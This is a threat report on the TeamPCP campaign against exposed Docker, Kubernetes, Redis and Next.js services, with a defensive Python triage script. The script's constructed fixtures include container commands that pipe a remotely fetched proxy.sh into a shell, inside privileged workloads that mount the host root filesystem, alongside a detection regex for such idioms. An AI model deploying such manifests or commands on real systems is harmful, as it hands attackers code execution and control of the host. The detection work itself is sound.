TeamPCP’s operations center on abusing unauthenticated or weakly protected orchestration and management interfaces rather than compromising user endpoints. Initial access comes from Docker Engine and Kubernetes APIs exposed to the internet, vulnerable React/Next.js applications (CVE-2025-29927), and unauthenticated Redis services. Once access is obtained, the attackers create standardized containers or jobs whose command fetches and executes a central bootstrap script (proxy.sh), which gives them code execution, persistence, and outbound connectivity in a single step.
The proxy.sh script is the operational backbone of the campaign. It installs tunneling and proxy tools (FRPS, gost), deploys several scanners, and registers persistent system services. The script fingerprints its environment and, when it detects that it is running inside a Kubernetes cluster, downloads and executes a dedicated payload (kube.py). That payload enumerates cluster resources, propagates to every reachable pod by executing commands through the API server (pods/exec), and deploys a privileged DaemonSet that mounts the host filesystem, so that every node in the cluster becomes a persistent botnet member.
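The three traits described above (a container whose command fetches and pipes a remote script into a shell, privileged execution with the host filesystem mounted, and one identity issuing pods/exec against many distinct pods) are all visible in API request bodies and audit logs. The following Python is an added triage example written for this page; it is not TeamPCP tooling or any project's code. The manifests, Docker create body and audit events are constructed, and the IP 203.0.113.10 is a TEST-NET-3 placeholder.

```python
"""Triage helpers: flag workloads that fetch-and-execute a remote bootstrap,
run privileged or mount host /, and flag pods/exec fan-out in audit logs.
All sample data below is constructed for illustration."""
import re
from collections import defaultdict
from typing import Any

# Shell idioms that pull a remote script and hand it straight to an interpreter,
# e.g. "curl -s http://host/proxy.sh | sh" or "sh -c \"$(wget -qO- ...)\"".
FETCH_EXEC_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|da)?sh\b"  # curl/wget ... | sh
    r"|\$\(\s*(?:curl|wget)\b",                     # $(curl ...) substitution
    re.IGNORECASE,
)


def _as_text(cmd: Any) -> str:
    """Docker and Kubernetes accept a string or a list for commands; normalise."""
    if cmd is None:
        return ""
    return cmd if isinstance(cmd, str) else " ".join(str(c) for c in cmd)


def fetches_and_executes(*cmd_parts: Any) -> bool:
    return bool(FETCH_EXEC_RE.search(" ".join(_as_text(p) for p in cmd_parts)))


def assess_workload(manifest: dict) -> list[str]:
    """Findings for a Pod, or for a DaemonSet/Deployment/Job pod template."""
    spec = manifest.get("spec", {})
    if "template" in spec:  # controller object: descend to the pod spec
        spec = spec["template"].get("spec", {})
    findings = [f for f in ("hostPID", "hostNetwork", "hostIPC") if spec.get(f)]
    host_root = {v["name"] for v in spec.get("volumes", [])
                 if (v.get("hostPath") or {}).get("path") == "/"}
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        name = c.get("name", "?")
        if (c.get("securityContext") or {}).get("privileged"):
            findings.append(f"{name}: privileged")
        for m in c.get("volumeMounts", []):
            if m.get("name") in host_root:
                findings.append(f"{name}: host / mounted at {m.get('mountPath')}")
        if fetches_and_executes(c.get("command"), c.get("args")):
            findings.append(f"{name}: fetch-and-execute command")
    return findings


def assess_docker_create(body: dict) -> list[str]:
    """Same checks for a Docker Engine API POST /containers/create body."""
    hc = body.get("HostConfig") or {}
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    if hc.get("PidMode") == "host":
        findings.append("PidMode=host")
    for bind in hc.get("Binds") or []:  # "src:dst[:opts]"
        src, _, rest = bind.partition(":")
        if src == "/":
            findings.append(f"host / bound at {rest.split(':')[0]}")
    if fetches_and_executes(body.get("Entrypoint"), body.get("Cmd")):
        findings.append("fetch-and-execute command")
    return findings


def exec_fanout(audit_events: list[dict], threshold: int = 5) -> dict[str, int]:
    """Users that opened pods/exec against more than `threshold` distinct pods."""
    targets: dict[str, set] = defaultdict(set)
    for ev in audit_events:
        ref = ev.get("objectRef") or {}
        if (ev.get("verb") == "create" and ref.get("resource") == "pods"
                and ref.get("subresource") == "exec"):
            user = (ev.get("user") or {}).get("username", "?")
            targets[user].add((ref.get("namespace"), ref.get("name")))
    return {u: len(p) for u, p in targets.items() if len(p) > threshold}


# Constructed samples (hypothetical; 203.0.113.10 is a TEST-NET-3 placeholder).
MALICIOUS_DAEMONSET = {"kind": "DaemonSet", "spec": {"template": {"spec": {
    "hostPID": True, "hostNetwork": True,
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
    "containers": [{"name": "worker", "image": "alpine:3.20",
                    "securityContext": {"privileged": True},
                    "command": ["/bin/sh", "-c"],
                    "args": ["wget -qO- http://203.0.113.10/proxy.sh | sh"],
                    "volumeMounts": [{"name": "host-root", "mountPath": "/host"}]}],
}}}}
BENIGN_DEPLOYMENT = {"kind": "Deployment", "spec": {"template": {"spec": {
    "containers": [{"name": "web", "image": "nginx:1.27",
                    "args": ["nginx", "-g", "daemon off;"]}]}}}}
DOCKER_CREATE_BODY = {
    "Image": "alpine:3.20",
    "Cmd": ["sh", "-c", "curl -s http://203.0.113.10/proxy.sh | sh"],
    "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/host:rw"]},
}
AUDIT_EVENTS = [
    {"verb": "create", "user": {"username": "system:serviceaccount:default:default"},
     "objectRef": {"resource": "pods", "subresource": "exec",
                   "namespace": f"ns{i % 3}", "name": f"pod-{i}"}}
    for i in range(8)
] + [{"verb": "get", "user": {"username": "alice"},
      "objectRef": {"resource": "pods", "namespace": "default", "name": "pod-0"}}]

if __name__ == "__main__":
    print("daemonset :", assess_workload(MALICIOUS_DAEMONSET))
    print("deployment:", assess_workload(BENIGN_DEPLOYMENT))
    print("docker    :", assess_docker_create(DOCKER_CREATE_BODY))
    print("exec fan-out:", exec_fanout(AUDIT_EVENTS))
```

In practice `assess_workload` runs as a validating admission check or over `kubectl get daemonsets -A -o json`, `assess_docker_create` over request logs from a Docker daemon that was reachable on 2375/2376, and `exec_fanout` over apiserver audit events; the threshold is a tuning knob, since a legitimate operator rarely execs into more than a handful of distinct pods in one window.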
Secondary tooling includes high-volume scanners (pcpcat.py, scanner.py) used to discover additional exposed infrastructure, automated React2Shell exploitation (react.py) for data theft and secondary payload deployment, and cryptomining components that deploy XMRig using obfuscated, multi-stage payloads. Post-exploitation activity also includes the use of the Sliver C2 framework, indicating interactive command-and-control and long-term operator-managed access.